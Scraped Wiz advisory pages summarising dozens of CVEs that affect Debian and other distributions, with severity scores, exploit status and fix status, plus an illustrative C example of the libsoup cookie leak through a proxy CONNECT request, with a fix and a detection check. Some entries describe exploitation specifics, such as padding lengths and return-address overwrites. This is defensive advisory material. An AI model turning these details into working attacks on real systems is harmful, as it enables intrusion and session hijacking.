Source : NVD
Score 8.4
Published February 11, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Linux De
## CVE-2025-68316 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Fix invalid probe error return value
After DME Link Startup, the error return value is set to the MIPI UniPro
GenericErrorCode which can be 0 (SUCCESS) or 1 (FAILURE). Upon failure
during driver probe, the error code 1 is propagated back to the driver
probe function which must return a negative value to indicate an error,
but 1 is not negative, so the probe is considered to be successful even
though it failed. Subsequently, removing the driver results in an oops
because it is not in a valid state.
This happens because none of the callers of ufshcd_init() expect a
non-negative error code.
Fix the return value and documentation to m
## CVE-2025-52536 [MEDIUM] CVSS 6.7 (Wiz): Linux Debian vulnerability analysis and mitigation
Improper Prevention of Lock Bit Modification in SEV firmware could allow a privileged attacker to downgrade firmware potentially resulting in a loss of integrity.
Source : NVD
Score 6.7
Published February 10, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## CVE-2025-71107 [MEDIUM] CVSS 5.5 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: ensure node page reads complete before f2fs_put_super() finishes
Xfstests generic/335, generic/336 sometimes crash with the following message:
F2FS-fs (dm-0): detect filesystem reference count leak during umount, type: 9, count: 1
------------[ cut here ]------------
kernel BUG at fs/f2fs/super.c:1939!
Oops: invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 UID: 0 PID: 609351 Comm: umount Tainted: G W 6.17.0-rc5-xfstests-g9dd1835ecda5 #1 PREEMPT(none)
Tainted: [W]=WARN
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
RIP: 0010:f2fs_put_super+0x3b3/0x3c0
Call Trace: generic_shutdown_super+0x7e/0x190
kill_bloc
## CVE-2025-68461 [HIGH] CVSS 7.2 (Wiz): Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a Cross-Site-Scripting (XSS) vulnerability via the animate tag in an SVG document.
Source : NVD
Score 6.1
Published December 18, 2025
Severity MEDIUM
CNA Score 7.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 91.3
Exploitation Probability (EPSS) 6.8
Affected packages and libraries
roundcube
roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Dec 18, 2025
Echo Severity MEDIUM Has Fix Added at: Dec 21, 2025
Ubuntu 18.04, 20.04, 22.04, 24.04 Severity HIGH Has
## CVE-2026-23555 [HIGH] CVSS 7.1 (Wiz): Linux Debian vulnerability analysis and mitigation
Any guest issuing a Xenstore command accessing a node using the
(illegal) node path "/local/domain/", will crash xenstored due to a
clobbered error indicator in xenstored when verifying the node path.
Note that the crash is forced via a failing assert() statement in
xenstored. In case xenstored is being built with NDEBUG #defined,
an unprivileged guest trying to access the node path "/local/domain/"
will result in it no longer being serviced by xenstored, other guests
(including dom0) will still be serviced, but xenstored will use up
all cpu time it can get.
Source : NVD
Score 7.1
Published March 23, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
## CVE-2026-3950 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in strukturag libheif up to 1.21.2. This impacts the function Track::load of the file libheif/sequences/track.cc of the component stsz/stts. The manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. Applying a patch is the recommended action to fix this issue. The patch available is unofficial and not yet approved.
Source : NVD
Score 4.8
Published March 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitat
## CVE-2025-14841 [MEDIUM] CVSS 4.8 (Wiz): Linux Debian vulnerability analysis and mitigation
A flaw has been found in OFFIS DCMTK up to 3.6.9. The impacted element is the function DcmQueryRetrieveIndexDatabaseHandle::startFindRequest/DcmQueryRetrieveIndexDatabaseHandle::startMoveRequest in the library dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. This manipulation causes null pointer dereference. The attack requires local access. Upgrading to version 3.7.0 is sufficient to resolve this issue. Patch name: ffb1a4a37d2c876e3feeb31df4930f2aed7fa030. You should upgrade the affected component.
Source : NVD
Score 4.8
Published December 18, 2025
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
## CVE-2025-6594 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Special.Apisandbox/ApiSandbox.Js.
This issue affects MediaWiki: from 1.27.0 before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has
## CVE-2025-68805 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix io-uring list corruption for terminated non-committed requests
When a request is terminated before it has been committed, the request
is not removed from the queue's list. This leaves a dangling list entry
that leads to list corruption and use-after-free issues.
Remove the request from the queue's list for terminated non-committed
requests.
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected pa
## CVE-2026-0847 [HIGH] CVSS 8.6 (Wiz): Linux Debian vulnerability analysis and mitigation
A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution
## CVE-2025-68726 [MEDIUM] CVSS 6.9 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: aead - Fix reqsize handling
Commit afddce13ce81d ("crypto: api - Add reqsize to crypto_alg")
introduced cra_reqsize field in crypto_alg struct to replace type
specific reqsize fields. It looks like this was introduced specifically
for ahash and acomp from the commit description as subsequent commits
add necessary changes in these alg frameworks.
However, this is being recommended for use in all crypto algs
instead of setting reqsize using crypto_*_set_reqsize(). Using
cra_reqsize in aead algorithms, hence, causes memory corruptions and
crashes as the underlying functions in the algorithm framework have not
been updated to set the reqsize pr
## CVE-2026-5119 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup. When establishing HTTPS tunnels through a configured HTTP proxy, sensitive session cookies are transmitted in cleartext within the initial HTTP CONNECT request. A network-positioned attacker or a malicious HTTP proxy can intercept these cookies, leading to potential session hijacking or user impersonation.
Source : NVD
Score 8.2
Published March 30, 2026
Severity HIGH
CNA Score 5.9
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup-devel
libsoup2.4
Sources
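The CVE-2026-5119 entry above comes down to which headers belong on which leg: the `CONNECT` request to the proxy travels in cleartext, so anything meant for the origin (Cookie, Authorization) must wait for the request sent inside the TLS tunnel, while Proxy-Authorization is the one credential the proxy legitimately needs. The following is an added example written for this page, not libsoup's code: it serialises the proxy-leg request both in the leaking shape (copy every client header) and in the corrected shape (withhold origin-only headers), plus a small check a reviewer can run over a captured proxy-leg request. All function and variable names are hypothetical, and the header set is constructed.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Added illustration of the CVE-2026-5119 leak, not libsoup's code: the
 * CONNECT request is the plaintext leg to the proxy, so only headers meant
 * for the proxy belong on it. Function and variable names are hypothetical. */

/* End-to-end credential headers for the origin. Proxy-Authorization is
 * deliberately absent: the proxy legitimately needs it. */
static const char *const origin_only[] = { "Cookie", "Cookie2", "Authorization" };

int is_origin_only_header(const char *line)
{
    for (size_t i = 0; i < sizeof origin_only / sizeof origin_only[0]; i++) {
        size_t n = strlen(origin_only[i]);
        if (strncasecmp(line, origin_only[i], n) == 0 && line[n] == ':')
            return 1;
    }
    return 0;
}

/* Serialises the CONNECT request into out. With copy_all_headers set, the
 * caller's whole header set is copied onto the proxy leg (the leaking
 * shape); otherwise origin-only headers are withheld for the request that
 * will travel inside the TLS tunnel. Returns bytes written, -1 on overflow. */
int build_connect_request(char *out, size_t cap, const char *host, int port,
                          const char *const *headers, size_t nheaders,
                          int copy_all_headers)
{
    int len = snprintf(out, cap, "CONNECT %s:%d HTTP/1.1\r\nHost: %s:%d\r\n",
                       host, port, host, port);
    if (len < 0 || (size_t)len >= cap)
        return -1;
    for (size_t i = 0; i < nheaders; i++) {
        if (!copy_all_headers && is_origin_only_header(headers[i]))
            continue;
        int n = snprintf(out + len, cap - (size_t)len, "%s\r\n", headers[i]);
        if (n < 0 || (size_t)n >= cap - (size_t)len)
            return -1;
        len += n;
    }
    int n = snprintf(out + len, cap - (size_t)len, "\r\n");
    if (n < 0 || (size_t)n >= cap - (size_t)len)
        return -1;
    return len + n;
}

/* Detection helper for a captured proxy-leg request: 1 if any header line
 * is a Cookie header (case-insensitive), 0 otherwise. */
int request_carries_cookie(const char *req)
{
    const char *line = req;
    while (*line) {
        if (strncasecmp(line, "Cookie:", 7) == 0)
            return 1;
        const char *eol = strstr(line, "\r\n");
        if (!eol)
            break;
        line = eol + 2;
    }
    return 0;
}

/* Constructed header set a client might hold for https://example.org/. */
const char *const demo_headers[] = {
    "Cookie: session=abc123",
    "Proxy-Authorization: Basic dXNlcjpwdw==",
    "User-Agent: demo/1.0",
};
const size_t demo_nheaders = 3;

/* Builds both shapes and returns 1 when the leaking shape carries the
 * cookie, the fixed one does not, and both still carry Proxy-Authorization. */
int demo_connect_leg(void)
{
    char leaky[512], fixed[512];
    if (build_connect_request(leaky, sizeof leaky, "example.org", 443,
                              demo_headers, demo_nheaders, 1) < 0)
        return 0;
    if (build_connect_request(fixed, sizeof fixed, "example.org", 443,
                              demo_headers, demo_nheaders, 0) < 0)
        return 0;
    return request_carries_cookie(leaky) == 1
        && request_carries_cookie(fixed) == 0
        && strstr(leaky, "Proxy-Authorization:") != NULL
        && strstr(fixed, "Proxy-Authorization:") != NULL;
}
```

`request_carries_cookie` is the practical check: point it at the bytes a client sends to the proxy before the TLS handshake (a packet capture on the proxy port will do) and any hit means session cookies are crossing the network in the clear regardless of what the origin leg looks like.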
## CVE-2025-71092 [HIGH] CVSS 7.8 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()
Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters
update") added three new counters and placed them after
BNXT_RE_OUT_OF_SEQ_ERR.
BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware
statistics with different num_counters values on chip_gen_p5_p7 devices.
As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating
hw_stats, which leads to an out-of-bounds write in
bnxt_re_copy_err_stats().
The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and
BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not
only p5/p7 devices.
Fix this
## CVE-2026-34956 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
heap overflow with a specially crafted FTP packet
Source : NVD
Published April 2, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openvswitch
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Apr 02, 2026
Debian 14 Has Fix Added at: Apr 02, 2026
Echo No Fix Added at: Apr 02, 2026
## CVE-2026-23203 [MEDIUM] CVSS 5.5 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: cpsw_new: Execute ndo_set_rx_mode callback in a work queue
Commit 1767bb2d47b7 ("ipv6: mcast: Don't hold RTNL for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP.") removed the RTNL lock for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP operations. However, this
change triggered the following call trace on my BeagleBone Black board:
WARNING: net/8021q/vlan_core.c:236 at vlan_for_each+0x120/0x124, CPU#0: rpcbind/496
RTNL: assertion failed at net/8021q/vlan_core.c (236)
Modules linked in:
CPU: 0 UID: 997 PID: 496 Comm: rpcbind Not tainted 6.19.0-rc6-next-20260122-yocto-standard+ #8 PREEMPT
Hardware name: Generic AM33XX (Flattened Device Tree)
Call trace:
Wiz
CVE-2026-3633 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-3633: Linux Debian vulnerability analysis and mitigation
soup_message_new()
Source : NVD
Score 6.5
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup
libsoup3-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 09, 2026
Echo Severity MEDIUM No Fix Added at: Mar 09, 2026
Red Hat 6, 7, 8, 9, 10 Severity LOW No Fix Added at: Mar 08, 2026
Red Hat 7 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No
Wiz
CVE-2025-14607 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-14607: Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in OFFIS DCMTK up to 3.6.9. Affected by this issue is the function DcmByteString::makeDicomByteString of the file dcmdata/libsrc/dcbytstr.cc of the component dcmdata. The manipulation results in memory corruption. The attack can be launched remotely. Upgrading to version 3.7.0 can resolve this issue. The patch is identified as 4c0e5c10079392c594d6a7abd95dd78ac0aa556a. You should upgrade the affected component.
Source : NVD
Score 5.3
Published December 13, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.8
Wiz
CVE-2026-5318 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-5318: Linux Debian vulnerability analysis and mitigation
A weakness has been identified in LibRaw up to 0.22.0. This impacts the function HuffTable::initval of the file src/decompressors/losslessjpeg.cpp of the component JPEG DHT Parser. This manipulation of the argument bits[] causes an out-of-bounds write. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 0.22.1 will fix this issue. Patch name: a6734e867b19d75367c05f872ac26322464e3995. It is advisable to upgrade the affected component.
Source : NVD
Score 5.3
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2017-20225 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
## CVE-2017-20225: Linux Debian vulnerability analysis and mitigation
TiEmu 2.08 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can trigger the overflow through command-line arguments passed to the application, leveraging ROP gadgets to bypass protections and execute shellcode in the application context.
Source : NVD
Score 9.3
Published March 28, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
Wiz
CVE-2026-5121 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-5121: Linux Debian vulnerability analysis and mitigation
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
Source : NVD
Score 9.8
Published March 30, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 47.5
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
bsdtar
libarchive
Wiz
CVE-2023-54249 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2023-54249: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: ep: Only send -ENOTCONN status if client driver is available
For the STOP and RESET commands, only send the channel disconnect status
-ENOTCONN if a client driver is available. Otherwise, it will result in a
null pointer dereference.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo
Wiz
CVE-2025-14936 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2025-14936: Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Attribute Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of attribute names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27269.
Source : NVD
Score 7.8
Published Decem
Wiz
CVE-2016-20044 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2016-20044: Echo vulnerability analysis and mitigation
PInfo 0.6.9-5.1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized argument to the -m parameter. Attackers can craft a malicious input string with 564 bytes of padding followed by a return address to overwrite the instruction pointer and execute shellcode with user privileges.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pinfo
Sources
NVD
Echo Severity HIGH No Fix
Wiz
CVE-2020-37182 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2020-37182: Echo vulnerability analysis and mitigation
Redir 3.3 contains a stack overflow vulnerability in the doproxyconnect() function that allows attackers to crash the application by sending oversized input. Attackers can exploit the sprintf() buffer without proper length checking to overwrite memory and cause a segmentation fault, resulting in program termination.
Source : NVD
Score 8.7
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
redir
Sources
NVD
Echo Severity HIGH No Fix Added at: Feb 15, 2026
Wiz
CVE-2025-31510 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
## CVE-2025-31510: Linux Debian vulnerability analysis and mitigation
In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication.
Source : NVD
Score 7.2
Published January 16, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
lemonldap-ng
Sources
NVD
Debian 11, 12, 13 Severity HIGH Has Fix Added at: Apr 08, 2025
Debian 14 Severity HIGH Has Fix Added at: Aug 10, 2025
Echo Severity HIGH Has
Wiz
CVE-2026-23305 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23305: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/rocket: fix unwinding in error path in rocket_probe
When rocket_core_init() fails (as could be the case with EPROBE_DEFER),
we need to properly unwind by decrementing the counter we just
incremented and if this is the first core we failed to probe, remove the
rocket DRM device with rocket_device_fini() as well. This matches the
logic in rocket_remove(). Failing to properly unwind results in
out-of-bounds accesses.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-1757 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
## CVE-2026-1757: Linux Debian vulnerability analysis and mitigation
A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.
Source : NVD
Score 6.2
Published February 2, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2025-3839 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
## CVE-2025-3839: Linux Debian vulnerability analysis and mitigation
A flaw was found in Epiphany, a tool that allows websites to open external URL handler applications with minimal user interaction. This design can be misused to exploit vulnerabilities within those handlers, making them appear remotely exploitable. The browser fails to properly warn or gate this action, resulting in potential code execution on the client device via trusted UI behavior.
Source : NVD
Score 8
Published January 23, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
CVE-2026-4541 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-4541: Linux Debian vulnerability analysis and mitigation
A flaw has been found in janmojzis tinyssh up to 20250501. Impacted is an unknown function of the file tinyssh/crypto_sign_ed25519_tinyssh.c of the component Ed25519 Signature Handler. This manipulation causes improper verification of a cryptographic signature. The attack is restricted to local execution. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. Upgrading to version 20260301 is recommended to address this issue. Patch name: 9c87269607e0d7d20174df742accc49c042cff17. Upgrading the affected component is recommended. If you want to get the best quality of vulnerability data, you may have to visit VulDB.
Source : NVD
Score 2
Wiz
CVE-2026-22206 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2026-22206: Linux Debian vulnerability analysis and mitigation
SPIP versions prior to 4.4.10 contain a SQL injection vulnerability that allows authenticated low-privilege users to execute arbitrary SQL queries by manipulating union-based injection techniques. Attackers can exploit this SQL injection flaw combined with PHP tag processing to achieve remote code execution on the server.
Source : NVD
Score 8.7
Published February 26, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 44.4
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity HIGH No Fix A
Wiz
CVE-2026-5663 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-5663: Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in OS command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
Source : NVD
Score 6.9
Published April 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 74.6
Exploitation Probability (EP
Wiz
CVE-2026-4739 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-4739: Linux Debian vulnerability analysis and mitigation
Integer Overflow or Wraparound vulnerability in InsightSoftwareConsortium ITK (Modules/ThirdParty/Expat/src/expat modules). This issue affects ITK: before 2.7.1.
Source : NVD
Score 9.4
Published March 24, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
seal-expat
Sources
NVD
Debian Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-23265 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2026-23265: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to do sanity check on node footer in {read,write}_end_io
-----------[ cut here ]------------
kernel BUG at fs/f2fs/data.c:358!
Call Trace: blk_update_request+0x5eb/0xe70 block/blk-mq.c:987
blk_mq_end_request+0x3e/0x70 block/blk-mq.c:1149
blk_complete_reqs block/blk-mq.c:1224 [inline]
blk_done_softirq+0x107/0x160 block/blk-mq.c:1229
handle_softirqs+0x283/0x870 kernel/softirq.c:579
__do_softirq kernel/softirq.c:613 [inline]
invoke_softirq kernel/softirq.c:453 [inline]
__irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680
irq_exit_rcu+0x9/0x30 kernel/softirq.c:696
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1050 [inline]
Wiz
CVE-2025-6589 [LOW] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
## CVE-2025-6589: Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/specials/pagers/BlockListPager.Php.
This issue affects MediaWiki: >= 1.42.0.
Source : NVD
Score 2.1
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Jul 03, 2025
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
Wiz
CVE-2026-3836 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-3836: Linux Debian vulnerability analysis and mitigation
